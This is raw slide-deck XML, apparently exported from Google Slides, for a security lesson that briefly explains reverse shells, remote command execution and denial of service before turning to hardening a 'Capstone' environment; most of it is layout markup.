                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Before a reverse-shell is placed on the victim machine, the attacker must run a r</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>emote command execution vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>. Because the connection is from victim to (remote) attacker, it is often not flagged or stopped by firewall configurations.</a:t>
            </a:r>
            <a:endParaRPr sz="14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4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4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400">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Fortunately there are ways to harden, or secure, the Capstone environment so these attacks will be much harder to pull off in the future. But first we’re going to look at the attacks in a little more detail.</a:t>
            </a:r>
            <a:endParaRPr sz="14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4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4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400" u="sng">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Footnote 1:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> ”DoS” stands for “Denial of Service,” which is when the organization’s servers are overwhelmed with requests and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>freeze</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>. So work comes to a halt.</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="202124"/>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8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7.png"/><Relationship Id="rId6"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5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61.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image55.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5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62.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6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6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6.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7.png"/><Relationship Id="rId8"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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image97.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image91.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image86.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8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90.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image88.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image100.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image95.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image89.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image98.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2.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10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0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7" name="Google Shape;1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8" name="Google Shape;88;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92" name="Google Shape;92;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 name="Google Shape;93;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4" name="Google Shape;94;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7" name="Google Shape;97;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9" name="Google Shape;99;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2" name="Google Shape;102;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4" name="Google Shape;104;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8" name="Google Shape;108;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9" name="Google Shape;109;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0" name="Google Shape;110;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3" name="Google Shape;113;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 name="Google Shape;114;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6" name="Shape 116"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="117" name="Google Shape;117;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8" name="Google Shape;118;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0" name="Google Shape;120;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 name="Google Shape;122;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 name="Google Shape;123;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4" name="Google Shape;124;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5" name="Google Shape;125;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6" name="Shape 126"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="127" name="Google Shape;127;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9" name="Google Shape;129;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 name="Google Shape;130;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31" name="Google Shape;131;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 name="Google Shape;132;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 name="Google Shape;133;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5" name="Google Shape;135;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6" name="Shape 136"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="137" name="Google Shape;137;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8" name="Google Shape;138;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40" name="Google Shape;140;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42" name="Google Shape;142;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5" name="Google Shape;145;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7" name="Shape 147"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="148" name="Google Shape;148;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9" name="Google Shape;149;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 name="Google Shape;150;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51" name="Google Shape;151;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52" name="Google Shape;152;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 name="Google Shape;154;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7" name="Shape 157"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="158" name="Google Shape;158;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 name="Google Shape;161;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 name="Google Shape;163;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 name="Google Shape;164;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5" name="Google Shape;165;p18"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1378813"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="166" name="Google Shape;166;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7" name="Google Shape;167;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8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="2228725"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="169" name="Google Shape;169;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0" name="Google Shape;170;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8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3073850"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="172" name="Google Shape;172;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3" name="Google Shape;173;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8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3923750"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="175" name="Google Shape;175;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6" name="Google Shape;176;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 name="Google Shape;182;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4" name="Shape 184"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="185" name="Google Shape;185;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 name="Google Shape;187;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 name="Google Shape;188;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9" name="Google Shape;189;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0" name="Google Shape;190;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 name="Google Shape;191;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 name="Google Shape;192;p19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1300225"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="193" name="Google Shape;193;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9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="2000125"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="196" name="Google Shape;196;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9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="2692850"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="199" name="Google Shape;199;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9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3390350"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="202" name="Google Shape;202;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1" name="Google Shape;211;p19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="469500" y="4083075"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="212" name="Google Shape;212;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3" name="Google Shape;213;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6" name="Shape 216"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="217" name="Google Shape;217;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0" name="Google Shape;220;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1" name="Google Shape;221;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2" name="Google Shape;222;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3" name="Google Shape;223;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 name="Google Shape;224;p20"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1237825"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="225" name="Google Shape;225;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6" name="Google Shape;226;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 name="Google Shape;228;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1828900"/>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2419975"/>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011050"/>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3602137"/>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0"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="4193262"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="246" name="Google Shape;24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7" name="Google Shape;24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 name="Google Shape;250;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 name="Google Shape;251;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 name="Google Shape;20;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 name="Google Shape;22;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3" name="Google Shape;23;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 name="Google Shape;25;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6" name="Google Shape;26;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 name="Google Shape;27;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8" name="Google Shape;2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53" name="Shape 253"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="254" name="Google Shape;254;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 name="Google Shape;256;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 name="Google Shape;257;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8" name="Google Shape;258;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9" name="Google Shape;259;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0" name="Google Shape;260;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1" name="Google Shape;261;p21"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1237825"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="262" name="Google Shape;262;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1828900"/>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2419975"/>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011050"/>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3602137"/>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1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="4193262"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="283" name="Google Shape;283;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4" name="Google Shape;284;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 name="Google Shape;286;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 name="Google Shape;288;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90" name="Shape 290"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="291" name="Google Shape;291;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4" name="Google Shape;294;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 name="Google Shape;296;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7" name="Google Shape;297;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8" name="Google Shape;298;p22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457222" y="1149803"/>
            <a:ext cx="713194" cy="446423"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="299" name="Google Shape;29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00" name="Google Shape;30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2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457222" y="1672428"/>
            <a:ext cx="713194" cy="446423"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="304" name="Google Shape;304;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5" name="Google Shape;305;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 name="Google Shape;307;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2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457197" y="2195578"/>
            <a:ext cx="713194" cy="446423"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="309" name="Google Shape;30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10" name="Google Shape;31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2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457197" y="2718203"/>
            <a:ext cx="713194" cy="446423"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="314" name="Google Shape;314;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5" name="Google Shape;315;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2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457222" y="3240828"/>
            <a:ext cx="713194" cy="446423"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="319" name="Google Shape;31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20" name="Google Shape;32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2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457222" y="3763453"/>
            <a:ext cx="713194" cy="446423"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="324" name="Google Shape;324;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5" name="Google Shape;325;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2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457222" y="4311603"/>
            <a:ext cx="713194" cy="446423"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="329" name="Google Shape;32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30" name="Google Shape;33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32" name="Shape 332"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="333" name="Google Shape;333;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 name="Google Shape;334;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5" name="Google Shape;335;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6" name="Google Shape;336;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7" name="Google Shape;337;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8" name="Google Shape;338;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23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457427" y="3873038"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="341" name="Google Shape;341;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2" name="Google Shape;342;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23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457315" y="4311142"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="346" name="Google Shape;346;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7" name="Google Shape;347;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23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457377" y="2996663"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="351" name="Google Shape;351;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52" name="Google Shape;352;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3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457265" y="3434767"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="356" name="Google Shape;356;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7" name="Google Shape;357;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3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457402" y="2135288"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="361" name="Google Shape;361;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62" name="Google Shape;362;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3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457290" y="2573392"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="366" name="Google Shape;366;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7" name="Google Shape;367;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3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457352" y="1258913"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="371" name="Google Shape;371;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72" name="Google Shape;372;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3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457240" y="1697017"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="376" name="Google Shape;376;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7" name="Google Shape;377;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9" name="Shape 379"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="380" name="Google Shape;380;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2" name="Google Shape;382;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4" name="Google Shape;384;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5" name="Google Shape;385;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4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457427" y="3873038"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="388" name="Google Shape;388;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9" name="Google Shape;389;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24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457315" y="4311142"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="393" name="Google Shape;393;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4" name="Google Shape;394;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4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457377" y="2996663"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="398" name="Google Shape;398;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9" name="Google Shape;399;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4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457265" y="3434767"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="403" name="Google Shape;403;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4" name="Google Shape;404;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4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457402" y="2135288"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="408" name="Google Shape;408;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9" name="Google Shape;409;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4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457290" y="2573392"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="413" name="Google Shape;413;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4" name="Google Shape;414;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4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457352" y="1258913"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="418" name="Google Shape;418;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9" name="Google Shape;419;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4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457240" y="1697017"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="423" name="Google Shape;423;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4" name="Google Shape;424;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6" name="Shape 426"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="427" name="Google Shape;427;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9" name="Google Shape;429;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0" name="Google Shape;430;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1" name="Google Shape;43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2" name="Google Shape;432;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3" name="Google Shape;433;p25"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="1345103"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="434" name="Google Shape;434;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5" name="Google Shape;435;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8" name="Google Shape;438;p25"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3305156" y="1345103"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
